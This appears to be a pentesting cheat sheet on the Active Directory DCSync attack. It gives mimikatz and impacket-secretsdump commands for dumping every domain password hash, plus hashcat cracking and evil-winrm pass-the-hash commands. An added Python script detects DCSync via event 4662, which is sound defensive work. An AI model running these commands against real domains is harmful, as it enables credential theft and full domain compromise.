Overview
The DCSync permission set in AD lets an account impersonate a domain controller and request the password hashes of every account from a real DC. The attack abuses the replication functionality between domain controllers, which can't be disabled because the DCs depend on it, so the defence is limiting who holds the replication rights and monitoring for replication requests from accounts that are not DCs.
Discovery
Required permissions (extended rights on the domain object, i.e. the root of the domain naming context):
- DS-Replication-Get-Changes (displayed as "Replicating Directory Changes")
- DS-Replication-Get-Changes-All (displayed as "Replicating Directory Changes All")
- DS-Replication-Get-Changes-In-Filtered-Set (displayed as "Replicating Directory Changes In Filtered Set")
The first two are what a secrets dump actually needs; auditing who holds them on the domain object is the defender's first check.
Groups that hold these permissions by default:
- Domain Admins
- Enterprise Admins
- Administrators
- Domain Controllers
Any other principal found with these rights (directory synchronisation service accounts, or an ACE added by an attacker for persistence) should be reviewed.
Exploitation
Local
# Using PowerSploit on a specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:[USERNAME]"'
# Using mimikatz
lsadump::dcsync /user:[USERNAME]
Remote
# Using impacket to dump all hashes
impacket-secretsdump -just-dc '[user]:[pass]@[ip]' -outputfile dcsync.hash
# Using impacket to dump only the Administrator account
impacket-secretsdump -just-dc '[user]:[pass]@[ip]' -outputfile dcsync.hash -just-dc-user Administrator
# Using impacket with Kerberos authentication (pass the ticket via KRB5CCNAME); the target must be the DC's FQDN
impacket-secretsdump -k -no-pass -just-dc '[domain]/[user]@[dc_fqdn]' -outputfile dcsync.hash
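The replication requests issued by the commands above appear in the domain controllers' Security log as event 4662 (the Directory Service Access audit subcategory has to be enabled), with the requested control-access rights listed as GUIDs in the Properties field. The script below is an added detection example and is not part of the original cheat sheet: it assumes the 4662 events have been exported from the DCs as dicts carrying the event's standard fields, uses the well-known GUIDs of the three replication rights and of the domainDNS class, and takes an allowlist of principals that are expected to replicate (the DC computer accounts plus any known sync service account). The sample events are constructed.

```python
"""Spot DCSync-style replication requests in Windows Security event 4662 data.

Added defender-side example, not code from the original cheat sheet. Assumes
the events were exported (Windows Event Forwarding, SIEM export, etc.) as dicts
with the fields EventID, Computer, TimeCreated, SubjectDomainName,
SubjectUserName, ObjectType and Properties. Sample events are constructed.
"""
import re
from dataclasses import dataclass, field

# Control-access-right GUIDs that a replication (DCSync) request exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# The pair needed to pull secrets; anything else is suspicious but lower severity.
SECRETS_RIGHTS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
# Schema class GUID of domainDNS; 4662 reports the domain root's object type this way.
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


@dataclass
class Finding:
    timestamp: str
    dc: str
    subject: str                      # DOMAIN\account that issued the request
    rights: list = field(default_factory=list)
    severity: str = "medium"


def _guid(value: str) -> str:
    """Normalise '%{GUID}', '{GUID}' or 'GUID' to a bare lower-case GUID."""
    return value.strip("%{} ").lower()


def analyze(events, expected_replicators):
    """Return a Finding for every 4662 event in which a principal outside the
    expected set requested replication rights on the domain naming context."""
    expected = {p.upper() for p in expected_replicators}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if _guid(ev.get("ObjectType", "")) != DOMAIN_DNS_CLASS:
            continue                  # not the domain root object
        requested = {_guid(g) for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in requested & REPLICATION_RIGHTS.keys())
        if not rights:
            continue                  # some other control-access right
        subject = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        if subject.upper() in expected:
            continue                  # DCs and known replication accounts
        severity = "high" if SECRETS_RIGHTS <= set(rights) else "medium"
        findings.append(Finding(ev.get("TimeCreated", ""), ev.get("Computer", ""),
                                subject, rights, severity))
    return findings


# Constructed sample: one legitimate DC-to-DC replication, one user account
# asking for the full secrets pair, one unrelated 4662 on a user object, and one
# service account asking only for the filtered-set right.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.local", "TimeCreated": "2024-01-15T09:00:01Z",
     "SubjectDomainName": "CORP", "SubjectUserName": "DC02$",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "TimeCreated": "2024-01-15T09:12:44Z",
     "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "Control Access\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n\t{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "TimeCreated": "2024-01-15T09:13:02Z",
     "SubjectDomainName": "CORP", "SubjectUserName": "jdoe",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",   # user class, not the domain root
     "Properties": "Control Access\n\t{00299570-246d-11d0-a768-00aa006e0529}"},
    {"EventID": 4662, "Computer": "DC02.corp.local", "TimeCreated": "2024-01-15T10:05:19Z",
     "SubjectDomainName": "CORP", "SubjectUserName": "svc_sync",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "Control Access\n\t{89e95b76-444d-4c62-991a-0facbeda640c}"},
]
EXPECTED_REPLICATORS = {"CORP\\DC01$", "CORP\\DC02$"}   # constructed allowlist


def run_sample():
    return analyze(SAMPLE_EVENTS, EXPECTED_REPLICATORS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.severity}] {f.timestamp} {f.dc}: {f.subject} requested {', '.join(f.rights)}")
```

Run as a script it flags the jdoe request as high and the svc_sync request as medium; point it at a real export by replacing SAMPLE_EVENTS. The allowlist is explicit rather than "skip anything ending in $" because any computer account that has been granted the rights can issue exactly the same request as a DC.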
Post-Exploitation
Once NTLM hashes are obtained, they can either be used in a pass-the-hash attack or cracked offline.
# Simple dictionary attack against the NT hashes (secretsdump writes them in pwdump format to dcsync.hash.ntds)
hashcat -a 0 -m 1000 --username dcsync.hash.ntds [wordlist]
# PTH with Evil-WinRM (-H takes the NT hash, not the LM hash)
evil-winrm -i [IP] -u [USERNAME] -H [NT HASH]
Resources
| Hyperlink | Info |
|---|---|
| PowerSploit | Contains Invoke-Mimikatz |
| Mimikatz | Versatile tool for pth, ptt, golden tickets, dcsync, pulling credentials, etc. |